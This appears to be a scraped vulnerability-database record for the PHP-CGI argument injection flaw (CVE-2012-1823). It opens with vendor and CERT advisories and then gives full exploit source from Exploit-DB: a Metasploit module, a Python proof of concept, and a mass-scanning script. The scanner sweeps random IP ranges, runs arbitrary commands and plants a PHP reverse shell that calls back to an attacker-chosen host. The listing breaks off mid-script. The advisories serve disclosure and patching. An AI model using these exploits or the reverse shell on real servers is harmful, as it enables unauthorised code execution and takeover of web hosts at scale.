bnc#753778\n", "edition": 1, "modified": "2012-05-09T06:08:17", "published": "2012-05-09T06:08:17", "id": "SUSE-SU-2012:0598-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00008.html", "type": "suse", "title": "Security update for PHP5 (critical)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:01", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823"], "description": "It was discovered that PHP, when used as a stand alone CGI processor \nfor the Apache Web Server, did not properly parse and filter query \nstrings. This could allow a remote attacker to execute arbitrary code \nrunning with the privilege of the web server. Configurations using \nmod_php5 and FastCGI were not vulnerable.\n\nThis update addresses the issue when the PHP CGI interpreter \nis configured using mod_cgi and mod_actions as described in \n/usr/share/doc/php5-cgi/README.Debian.gz; however, if an alternate \nconfiguration is used to enable PHP CGI processing, it should be \nreviewed to ensure that command line arguments cannot be passed to \nthe PHP interpreter. 
Please see CVE-2012-2311 for more details and \npotential mitigation approaches.", "edition": 5, "modified": "2012-05-04T00:00:00", "published": "2012-05-04T00:00:00", "id": "USN-1437-1", "href": "https://ubuntu.com/security/notices/USN-1437-1", "title": "PHP vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2020-09-18T20:42:00", "bulletinFamily": "info", "cvelist": ["CVE-2012-1823", "CVE-2012-2311"], "description": "### Overview \n\nPHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files.\n\n### Description \n\nAccording to PHP's [website](<http://php.net/>), \"PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.\" When PHP is used in a CGI-based setup (such as Apache's `mod_cgid`), the `php-cgi` binary receives the processed query string as command-line arguments. This allows command-line switches such as `-s`, `-d` or `-c` to be passed to `php-cgi`, which can be exploited to disclose source code and obtain arbitrary code execution.\n\nAn example of the `-s` switch, which allows an attacker to view the source code of `index.php`, is below: \n`<http://localhost/index.php?-s>` \n \nAdditional information can be found in the vulnerability reporter's [blog post](<http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>). \n \n--- \n \n### Impact \n\nA remote unauthenticated attacker could obtain sensitive information, cause a denial-of-service condition, or execute arbitrary code with the privileges of the web server. \n \n--- \n \n### Solution \n\n**Apply update** \n \nPHP has released versions [5.4.3](<http://www.php.net/archive/2012.php#id2012-05-08-1>) and [5.3.13](<http://www.php.net/archive/2012.php#id2012-05-08-1>) to address this vulnerability. PHP is recommending that users upgrade to the latest version of PHP. 
\n \nPHP has stated, _PHP 5.3.12/5.4.2 do not fix all variations of the CGI issues described in CVE-2012-1823. It has also come to our attention that some sites use an insecure cgiwrapper script to run PHP. These scripts will use $* instead of \"$@\" to pass parameters to php-cgi which causes a number of issues._ \n \n--- \n \n**Apply mod_rewrite rule** \n \nPHP has [stated](<http://www.php.net/archive/2012.php#id2012-05-03-1>) that _an alternative is to configure your web server to not let these types of requests with query strings starting with a \"-\" and not containing a \"=\" through. Adding a rule like this should not break any sites. For Apache using mod_rewrite it would look like this_: \n \n` RewriteCond %{QUERY_STRING} ^[^=]*$` \n` RewriteCond %{QUERY_STRING} %2d|\\- [NC]` \n` RewriteRule .? - [F,L]` \n \n--- \n \n### Vendor Information\n\nAccording to PHP's [website](<http://www.php.net/archive/2012.php#id2012-05-03-1>), *Apache+mod_php and nginx+php-fpm are not affected.* \n \n--- \n \n520827\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### The PHP Group Affected\n\nNotified: February 23, 2012 Updated: May 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://php.net/ChangeLog-5.php>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9 | AV:N/AC:L/Au:N/C:C/I:P/A:P \nTemporal | 8.5 | E:F/RL:U/RC:C \nEnvironmental | 8.7 | CDP:L/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://www.php.net/>\n * <http://www.php.net/manual/en/security.cgi-bin.php>\n * <http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/>\n * <http://www.php.net/archive/2012.php#id2012-05-03-1>\n * <http://www.php.net/archive/2012.php#id2012-05-08-1>\n * <http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices>\n\n### Acknowledgements\n\nThanks to De Eindbazen for reporting this vulnerability.\n\nThis document was written by Michael Orlando.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-1823](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-1823>), [CVE-2012-2311](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-2311>) \n---|--- \n**Date Public:** | 2012-05-03 \n**Date First Published:** | 2012-05-03 \n**Date Last Updated: ** | 2013-12-02 04:26 UTC \n**Document Revision: ** | 50 \n", "modified": "2013-12-02T04:26:00", "published": "2012-05-03T00:00:00", "id": "VU:520827", "href": "https://www.kb.cert.org/vuls/id/520827", "type": "cert", "title": "PHP-CGI query string parameter vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-2311", "CVE-2012-1823", "CVE-2012-2329"], "description": "\nThe PHP 
Development Team reports:\n\nThe release of PHP 5.4.13 and 5.4.3 complete a fix for the\n\t vulnerability in CGI-based setups as originally described in\n\t CVE-2012-1823. (CVE-2012-2311)\nNote: mod_php and php-fpm are not vulnerable to this attack.\nPHP 5.4.3 fixes a buffer overflow vulnerability in the\n\t apache_request_headers() (CVE-2012-2329).\n\n", "edition": 4, "modified": "2012-05-08T00:00:00", "published": "2012-05-08T00:00:00", "id": "59B68B1E-9C78-11E1-B5E0-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/59b68b1e-9c78-11e1-b5e0-000c299b62e1.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-08-13T15:37:10", "description": "Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2). CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. Remote exploit for PHP ...", "published": "2013-11-01T00:00:00", "type": "exploitdb", "title": "Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2013-11-01T00:00:00", "id": "EDB-ID:40233", "href": "https://www.exploit-db.com/exploits/40233/", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2016-02-02T10:32:12", "description": "PHP CGI Argument Injection. CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. 
Remote exploit for php platform", "published": "2012-05-04T00:00:00", "type": "exploitdb", "title": "PHP CGI Argument Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2012-05-04T00:00:00", "id": "EDB-ID:18834", "href": "https://www.exploit-db.com/exploits/18834/", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'PHP CGI Argument Injection',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tWhen run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to\r\n\t\t\t\tan argument injection vulnerability. This module takes advantage of\r\n\t\t\t\tthe -d flag to set php.ini directives to achieve code execution.\r\n\t\t\t\tFrom the advisory: \"if there is NO unescaped '=' in the query string,\r\n\t\t\t\tthe string is split on '+' (encoded space) characters, urldecoded,\r\n\t\t\t\tpassed to a function that escapes shell metacharacters (the \"encoded in\r\n\t\t\t\ta system-defined manner\" from the RFC) and then passes them to the CGI\r\n\t\t\t\tbinary.\"\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'egypt', 'hdm' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' => [\r\n\t\t\t\t\t[ \"CVE\"\t, \"2012-1823\" ],\r\n\t\t\t\t\t[ \"URL\"\t, \"http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/\" ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t# Arbitrary big number. 
The payload gets sent as an HTTP\r\n\t\t\t\t\t# response body, so really it's unlimited\r\n\t\t\t\t\t'Space' => 262144, # 256k\r\n\t\t\t\t},\r\n\t\t\t'DisclosureDate' => 'May 03 2012',\r\n\t\t\t'Platform' => 'php',\r\n\t\t\t'Arch' => ARCH_PHP,\r\n\t\t\t'Targets' => [[ 'Automatic', { }]],\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptString.new('TARGETURI', [false, \"The URI to request (must be a CGI-handled PHP script)\"]),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\t# php-cgi -h\r\n\t# ...\r\n\t# -s Display colour syntax highlighted source.\r\n\tdef check\r\n\t\turi = target_uri.path\r\n\r\n\t\turi.gsub!(/\\?.*/, \"\")\r\n\r\n\t\tprint_status(\"Checking uri #{uri}\")\r\n\r\n\t\tresponse = send_request_raw({ 'uri' => uri })\r\n\r\n\t\tif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\<\\;\\?/mi\r\n\t\t\tprint_error(\"Server responded in a way that was ambiguous, could not determine whether it was vulnerable\")\r\n\t\t\treturn Exploit::CheckCode::Unknown\r\n\t\tend\r\n\r\n\t\tresponse = send_request_raw({ 'uri' => uri + '?-s'})\r\n\t\tif response and response.code == 200 and response.body =~ /\\<code\\>\\<span style.*\\<\\;\\?/mi\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\tprint_error(\"Server responded indicating it was not vulnerable\")\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tbegin\r\n\t\t\targs = [\r\n\t\t\t\t\"-d+allow_url_include%3d#{rand_php_ini_true}\",\r\n\t\t\t\t\"-d+safe_mode%3d#{rand_php_ini_false}\",\r\n\t\t\t\t\"-d+suhosin.simulation%3d#{rand_php_ini_true}\",\r\n\t\t\t\t\"-d+disable_functions%3d%22%22\",\r\n\t\t\t\t\"-d+open_basedir%3dnone\",\r\n\t\t\t\t\"-d+auto_prepend_file%3dphp://input\",\r\n\t\t\t\t\"-n\"\r\n\t\t\t]\r\n\r\n\t\t\tqs = args.join(\"+\")\r\n\t\t\turi = \"#{target_uri}?#{qs}\"\r\n\r\n\t\t\t# Has to be all on one line, so gsub out the comments and the newlines\r\n\t\t\tpayload_oneline = \"<?php \" + 
payload.encoded.gsub(/\\s*#.*$/, \"\").gsub(\"\\n\", \"\")\r\n\t\t\tresponse = send_request_cgi( {\r\n\t\t\t\t'method' => \"POST\",\r\n\t\t\t\t'global' => true,\r\n\t\t\t\t'uri' => uri,\r\n\t\t\t\t'data' => payload_oneline,\r\n\t\t\t}, 0.5)\r\n\t\t\thandler\r\n\r\n\t\trescue ::Interrupt\r\n\t\t\traise $!\r\n\t\trescue ::Rex::HostUnreachable, ::Rex::ConnectionRefused\r\n\t\t\tprint_error(\"The target service unreachable\")\r\n\t\trescue ::OpenSSL::SSL::SSLError\r\n\t\t\tprint_error(\"The target failed to negotiate SSL, is this really an SSL service?\")\r\n\t\tend\r\n\r\n\tend\r\n\r\n\tdef rand_php_ini_false\r\n\t\tRex::Text.to_rand_case([ \"0\", \"off\", \"false\" ][rand(3)])\r\n\tend\r\n\r\n\tdef rand_php_ini_true\r\n\t\tRex::Text.to_rand_case([ \"1\", \"on\", \"true\" ][rand(3)])\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18834/"}, {"lastseen": "2016-02-02T10:32:19", "description": "PHP CGI Argument Injection Exploit. CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. 
Remote exploit for php platform", "published": "2012-05-05T00:00:00", "type": "exploitdb", "title": "PHP CGI Argument Injection Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2012-05-05T00:00:00", "id": "EDB-ID:18836", "href": "https://www.exploit-db.com/exploits/18836/", "sourceData": "######################################################################################\r\n# Exploit Title: Cve-2012-1823 PHP CGI Argument Injection Exploit\r\n# Date: May 4, 2012\r\n# Author: rayh4c[0x40]80sec[0x2e]com\r\n# Exploit Discovered by wofeiwo[0x40]80sec[0x2e]com\r\n######################################################################################\r\n\r\nimport socket\r\nimport sys\r\n\r\ndef cgi_exploit():\r\n pwn_code = \"\"\"<?php phpinfo();?>\"\"\" \r\n post_Length = len(pwn_code)\r\n http_raw=\"\"\"POST /?-dallow_url_include%%3don+-dauto_prepend_file%%3dphp://input HTTP/1.1\r\nHost: %s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %s\r\n\r\n%s\r\n\"\"\" %(HOST , post_Length ,pwn_code)\r\n print http_raw\r\n try:\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n sock.connect((HOST, int(PORT)))\r\n sock.send(http_raw)\r\n data = sock.recv(10000)\r\n print repr(data)\r\n sock.close()\r\n except socket.error, msg:\r\n sys.stderr.write(\"[ERROR] %s\\n\" % msg[1])\r\n sys.exit(1)\r\n \r\nif __name__ == '__main__':\r\n try:\r\n HOST = sys.argv[1]\r\n PORT = sys.argv[2]\r\n cgi_exploit()\r\n except IndexError:\r\n print '[+]Usage: cgi_test.py site.com 80'\r\n sys.exit(-1)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/18836/"}, {"lastseen": "2016-02-03T10:02:19", "description": "Apache + PHP 5.x - Remote Code Execution (Multithreaded Scanner) (2). CVE-2012-1823,CVE-2012-2311,CVE-2012-2336. 
Remote exploit for php platform", "published": "2013-10-31T00:00:00", "type": "exploitdb", "title": "Apache + PHP 5.x - Remote Code Execution Multithreaded Scanner 2", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2311", "CVE-2012-2336", "CVE-2012-1823"], "modified": "2013-10-31T00:00:00", "id": "EDB-ID:29316", "href": "https://www.exploit-db.com/exploits/29316/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# ap-unlock-v2.py - apache + php 5.* rem0te c0de execution 0day (better version)\r\n#\r\n# NOTE:\r\n# - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((\r\n# - for connect back shell start netcat/nc and bind port on given host:port\r\n# - is ip-range scanner not is multithreaded, but iz multithreaded iz in\r\n# random scanner and is scanner from file (greets to MustLive)\r\n# - no ssl support\r\n# - more php paths can be added\r\n# - adjust this shit for windows b0xes\r\n#\r\n# 2013\r\n# by noptrix - http://nullsecurity.net/\r\n\r\nimport sys\r\nimport socket\r\nimport argparse\r\nimport threading\r\nimport time\r\nimport random\r\nimport select\r\n\r\n\r\nNONE = 0\r\nVULN = 1\r\nSCMD = 2\r\nXPLT = 3\r\n\r\nt3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \\\r\n '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \\\r\n '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \\\r\n '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\\\r\n '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\\r\\nHost:localhost\\r\\n'\\\r\n 'Content-Type: text/html\\r\\nContent-Length:1\\r\\n\\r\\na\\r\\n'\r\n\r\n\r\ndef m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt):\r\n c0nn_b4ck = \\\r\n '''\r\n <? 
set_time_limit (0); $VERSION = \"1.0\"; $ip = \"''' + cb_h0st + '''\";\r\n $port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null;\r\n $error_a = null; $shell = \"unset HISTFILE; id; /bin/sh -i\"; $daemon = 0;\r\n $debug = 0; if (function_exists(\"pcntl_fork\")) {$pid = pcntl_fork();\r\n if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {\r\n exit(1);}$daemon = 1;} else {print \"bla\";}chdir(\"/\");umask(0);\r\n $sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {\r\n printit(\"$errstr ($errno)\");exit(1);}$descriptorspec = array(\r\n 0 => array(\"pipe\", \"r\"), 1 => array(\"pipe\", \"w\"),2 => array(\"pipe\", \"w\"));\r\n $process = proc_open($shell, $descriptorspec, $pipes);\r\n if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);\r\n stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);\r\n printit(\"Successfully opened reverse shell to $ip:$port\");while (1) {\r\n if (feof($sock)) {printit(\"ERROR: Shell connection terminated\");break;}\r\n if (feof($pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\r\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\r\n $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\n if (in_array($sock, $read_a)) {if ($debug) printit(\"SOCK READ\");\r\n\t$input = fread($sock, $chunk_size);if ($debug) printit(\"SOCK: $input\");\r\n fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {\r\n if ($debug) printit(\"STDOUT READ\");$input = fread($pipes[1], $chunk_size);\r\n\tif ($debug) printit(\"STDOUT: $input\");fwrite($sock, $input);}\r\n\tif (in_array($pipes[2], $read_a)) {if ($debug) printit(\"STDERR READ\");\r\n $input = fread($pipes[2], $chunk_size);\r\n if ($debug) printit(\"STDERR: $input\");fwrite($sock, $input);}}fclose($sock);\r\n fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);\r\n function printit ($string) {if (!$daemon) {print \"$string\\n\";}}?>\r\n '''\r\n return 
c0nn_b4ck\r\n\r\n\r\ndef enc0dez():\r\n n33dz1 = ('cgi-bin', 'php')\r\n n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',\r\n 'suhosin.simulation=on', '-d', 'disable_functions=\"\"', '-d',\r\n 'open_basedir=none', '-d', 'auto_prepend_file=php://input',\r\n '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',\r\n '-d', 'auto_prepend_file=php://input', '-n')\r\n fl4g = 0\r\n arg5 = ''\r\n p4th = ''\r\n plus = ''\r\n \r\n for x in n33dz2:\r\n if fl4g == 1:\r\n plus = '+'\r\n arg5 = arg5 + plus + \\\r\n ''.join('%' + c.encode('utf-8').encode('hex') for c in x)\r\n fl4g = 1\r\n for x in n33dz1:\r\n p4th = p4th + '/' + \\\r\n ''.join('%' + c.encode('utf-8').encode('hex') for c in x)\r\n return (p4th.upper(), arg5.upper())\r\n\r\n\r\ndef m4k3_p4yl0rd(p4yl0rd, m0de):\r\n p4th, arg5 = enc0dez()\r\n if m0de == VULN:\r\n p4yl0rd = t3st\r\n elif m0de == SCMD or m0de == XPLT:\r\n p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\\r\\n' \\\r\n 'Host: ' + sys.argv[1] + '\\r\\n' \\\r\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' \\\r\n 'Content-Length: ' + str(len(p4yl0rd)) + '\\r\\n\\r\\n' + p4yl0rd\r\n return p4yl0rd\r\n\r\n\r\ndef s3nd_sh1t(args, m0de, c0nn_b4ck):\r\n pat = '<b>Parse error</b>:'\r\n try:\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.settimeout(float(args.t))\r\n res = s.connect_ex((args.h, int(args.p)))\r\n if res == 0:\r\n if m0de == VULN:\r\n p4yl0rd = m4k3_p4yl0rd('', m0de)\r\n s.sendall(p4yl0rd)\r\n if pat in s.recv(4096):\r\n print \"--> \" + args.h + \" vu1n\"\r\n return args.h\r\n else:\r\n if args.v:\r\n print \"--> %s n0t vu1n\" % (args.h)\r\n return\r\n elif m0de == SCMD:\r\n p4yl0rd = m4k3_p4yl0rd('<? 
system(\"' + args.c + '\"); ?>', m0de)\r\n s.sendall(p4yl0rd)\r\n rd, wd, ex = select.select([s], [], [], float(args.t))\r\n if rd:\r\n for line in s.makefile():\r\n print line,\r\n elif m0de == XPLT:\r\n p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)\r\n s.sendall(p4yl0rd)\r\n else:\r\n if args.v:\r\n print \"--> n0 w3bs3rv3r 0n %s\" % (args.h)\r\n except socket.error:\r\n return\r\n return\r\n\r\n\r\ndef m4k3_r4nd_1p4ddr(num):\r\n h0sts = []\r\n for x in range(int(num)):\r\n h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),\r\n random.randrange(0,255), random.randrange(0,255),\r\n random.randrange(0,255)))\r\n return h0sts\r\n\r\n\r\ndef sc4n_r4nd0m(args, h0st, m0de, vu1nz):\r\n args.h = h0st\r\n vu1nz.append(s3nd_sh1t(args, m0de, None))\r\n vu1nz = filter(None, vu1nz)\r\n return\r\n\r\n\r\ndef sc4n_fr0m_f1le(args, h0st, m0de, vu1nz):\r\n args.h = h0st.rstrip()\r\n vu1nz.append(s3nd_sh1t(args, m0de, None))\r\n vu1nz = filter(None, vu1nz)\r\n return\r\n\r\n\r\ndef sc4n_r4ng3(rsa, rsb, args, m0de):\r\n vu1nz = []\r\n for i in range (rsa[0], rsb[0]):\r\n for j in range (rsa[1], rsb[1]):\r\n for k in range (rsa[2], rsb[2]):\r\n for l in range(rsa[3], rsb[3]):\r\n args.h = str(i) + \".\" + str(j) + \".\" + str(k) + \".\" + str(l)\r\n vu1nz.append(s3nd_sh1t(args, m0de, None))\r\n time.sleep(0.005)\r\n vu1nz = filter(None, vu1nz)\r\n return vu1nz\r\n\r\n\r\ndef m4k3_ipv4_r4ng3(iprange):\r\n a = tuple(part for part in iprange.split('.'))\r\n rsa = (range(4))\r\n rsb = (range(4))\r\n for i in range(0,4):\r\n ga = a[i].find('-')\r\n if ga != -1:\r\n rsa[i] = int(a[i][:ga])\r\n rsb[i] = int(a[i][1+ga:]) + 1 \r\n else:\r\n rsa[i] = int(a[i])\r\n rsb[i] = int(a[i]) + 1\r\n return (rsa, rsb)\r\n\r\n\r\ndef parse_args():\r\n p = argparse.ArgumentParser(\r\n usage='\\n\\n ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\\\r\n '\\n ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]',\r\n formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)\r\n 
opts = p.add_argument_group('0pt1ons', '')\r\n opts.add_argument('-h', metavar='wh1t3h4tz.0rg',\r\n help='| t3st s1ngle h0st f0r vu1n')\r\n opts.add_argument('-p', default=80, metavar='80',\r\n help='| t4rg3t p0rt (d3fau1t: 80)')\r\n opts.add_argument('-c', metavar='\\'uname -a;id\\'',\r\n help='| s3nd c0mm4nds t0 h0st')\r\n opts.add_argument('-x', metavar='192.168.0.2:1337',\r\n help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')\r\n opts.add_argument('-s', action='store_true',\r\n help='| t3st s1ngl3 h0st f0r vu1n')\r\n opts.add_argument('-r', metavar='133.1.3-7.7-37',\r\n help='| sc4nz iP addr3ss r4ng3 f0r vu1n')\r\n opts.add_argument('-R', metavar='1337',\r\n help='| sc4nz num r4nd0m h0st5 f0r vu1n')\r\n opts.add_argument('-t', default=3, metavar='3',\r\n help='| t1me0ut in s3x (d3fau1t: 3)')\r\n opts.add_argument('-f', metavar='vu1n.lst',\r\n help='| wr1t3 vu1n h0sts t0 f1l3')\r\n opts.add_argument('-i', metavar='sc4nz.lst',\r\n help='| sc4nz h0sts fr0m f1le f0r vu1n')\r\n opts.add_argument('-S', metavar='2',\r\n help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)')\r\n opts.add_argument('-T', default=2, metavar='4',\r\n help='| nuM sc4n thr3adz (d3fault: 4)')\r\n opts.add_argument('-v', action='store_true',\r\n help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')\r\n args = p.parse_args()\r\n if not args.h and not args.r and not args.R and not args.i:\r\n p.print_help()\r\n sys.exit(0)\r\n return args\r\n\r\n\r\ndef wr1te_fil3(args, vu1nz):\r\n if args.f:\r\n if vu1nz:\r\n try:\r\n f = open(args.f, \"w\")\r\n f.write(\"\\n\".join(vu1nz)+\"\\n\")\r\n f.close()\r\n except:\r\n sys.stderr.write('de1n3 mudd1 k0cht guT')\r\n sys.stderr.write('\\n')\r\n raise SystemExit()\r\n return\r\n\r\n\r\ndef c0ntr0ller():\r\n vu1nz = []\r\n m0de = NONE\r\n try:\r\n args = parse_args()\r\n if not args.t:\r\n args.t = float(3)\r\n if args.h:\r\n if args.s:\r\n print \"[+] sc4nn1ng s1ngl3 h0st %s \" % (args.h)\r\n m0de = VULN\r\n s3nd_sh1t(args, m0de, None)\r\n elif args.c:\r\n print \"[+] 
s3nd1ng c0mm4ndz t0 h0st %s \" % (args.h)\r\n m0de = SCMD\r\n s3nd_sh1t(args, m0de, None)\r\n elif args.x:\r\n print \"[+] xpl0it1ng b0x %s \" % (args.h)\r\n m0de = XPLT\r\n if args.x.find(':') != -1:\r\n if not args.x.split(':')[1]:\r\n print \"[-] 3rr0r: p0rt m1ss1ng\"\r\n else:\r\n cb_h0st = args.x.split(':')[0]\r\n cb_p0rt = args.x.split(':')[1]\r\n else:\r\n print \"[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r\"\r\n c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt)\r\n s3nd_sh1t(args, m0de, c0nn_b4ck)\r\n else:\r\n print \"[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch\"\r\n sys.exit(-1)\r\n if args.r:\r\n print \"[+] sc4nn1ng r4ng3 %s \" % (args.r)\r\n m0de = VULN\r\n rsa, rsb = m4k3_ipv4_r4ng3(args.r)\r\n vu1nz = sc4n_r4ng3(rsa, rsb, args, m0de)\r\n if args.R:\r\n print \"[+] sc4nn1ng %d r4nd0m b0xes\" % (int(args.R))\r\n m0de = VULN\r\n if not args.S:\r\n args.S = float(2)\r\n h0sts = m4k3_r4nd_1p4ddr(int(args.R))\r\n for h0st in h0sts:\r\n try:\r\n t = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st,\r\n m0de, vu1nz))\r\n t.start()\r\n time.sleep(float(args.S))\r\n while threading.activeCount() > int(args.T):\r\n time.sleep(2)\r\n except:\r\n sys.stdout.flush()\r\n sys.stdout.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\")\r\n raise SystemExit\r\n if args.i:\r\n print \"[+] sc4nn1ng b0xes fr0m f1le %s\" % (args.i)\r\n m0de = VULN\r\n h0sts = tuple(open(args.i, 'r'))\r\n if not args.S:\r\n args.S = float(2)\r\n for h0st in h0sts:\r\n try:\r\n t = threading.Thread(target=sc4n_fr0m_f1le, args=(args,\r\n h0st, m0de, vu1nz))\r\n t.start()\r\n time.sleep(float(args.S))\r\n while threading.activeCount() > int(args.T):\r\n time.sleep(2)\r\n except KeyboardInterrupt:\r\n sys.stdout.flush()\r\n sys.stdout.write(\"\\b\\b[!] w4rn1ng: ab0rt3d bY us3r\\n\")\r\n raise SystemExit\r\n #sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz)\r\n except KeyboardInterrupt:\r\n sys.stdout.flush()\r\n sys.stderr.write(\"\\b\\b[!] 
